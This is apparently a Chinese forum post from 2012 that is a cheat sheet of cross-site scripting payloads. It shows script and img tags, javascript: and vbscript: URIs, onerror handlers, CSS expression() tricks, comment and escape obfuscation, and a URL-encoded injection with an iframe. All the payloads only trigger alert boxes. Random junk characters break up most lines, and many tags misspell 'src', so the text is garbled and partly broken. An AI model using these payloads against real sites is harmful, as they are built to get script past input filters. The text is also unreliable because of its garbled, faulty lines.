<script>alert("跨站")</script> (最常用)
) D0 z8 ^) I9 q8 J, Q4 T2 l Y<img scr=javascript:alert("跨站")></img>
' O9 O, D2 _; p<img scr="javascript: alert(/跨站/)></img>1 J$ B" `( r) `
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
5 Y4 k% W5 W4 g# j# J c; \4 M<img scr="#" onerror=alert(/跨站/)></img>7 M8 j2 c6 D/ c# t$ L
<img scr="#" style="xss:expression(alert(/xss/));"></img>
; j0 }: Y5 @/ o: ]: N. g9 }+ p<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
; l$ Z1 [ l. f! a<img src=vbscript:msgbox ("xss")></img>
) U+ c2 ^# M% e2 H' B' f/ k$ `9 o<style> input {left:expression (alert('xss'))}</style>
' I3 f6 q) F8 q/ t2 u4 ~- Q<div style={left:expression (alert('xss'))}></div>
! N5 M* ]9 K/ ]+ o<div style={left:exp/* */ression (alert('xss'))}></div>$ C# u8 K( W4 o, Z$ b9 W( \
<div style={left:\0065\0078ression (alert('xss'))}></div>
, q' s% u: ]# E$ p% z1 yhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
1 R3 Y) t, ?. z7 C; H. tunicode <div style="{left:expRessioN (alert('xss'))}">2 h& y$ c9 E4 k8 V2 K- y
( E7 w5 \- X1 D! E1 Q"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["! O8 ] R7 h) e; m0 z
|
发表于 2012-9-13 17:15:04
收藏
支持
反对